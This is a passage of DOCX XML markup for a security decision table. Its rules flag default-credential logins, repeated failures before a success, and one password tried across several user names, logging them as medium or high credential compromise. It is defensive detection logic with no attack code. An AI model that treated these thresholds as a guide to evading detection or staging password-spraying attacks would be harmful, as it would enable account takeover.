              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Successful default-credential login?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">≥ 3 failures before the success?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Same password with ≥ 3 user names?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log CREDENTIAL_COMPROMISE — MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log CREDENTIAL_COMPROMISE — HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
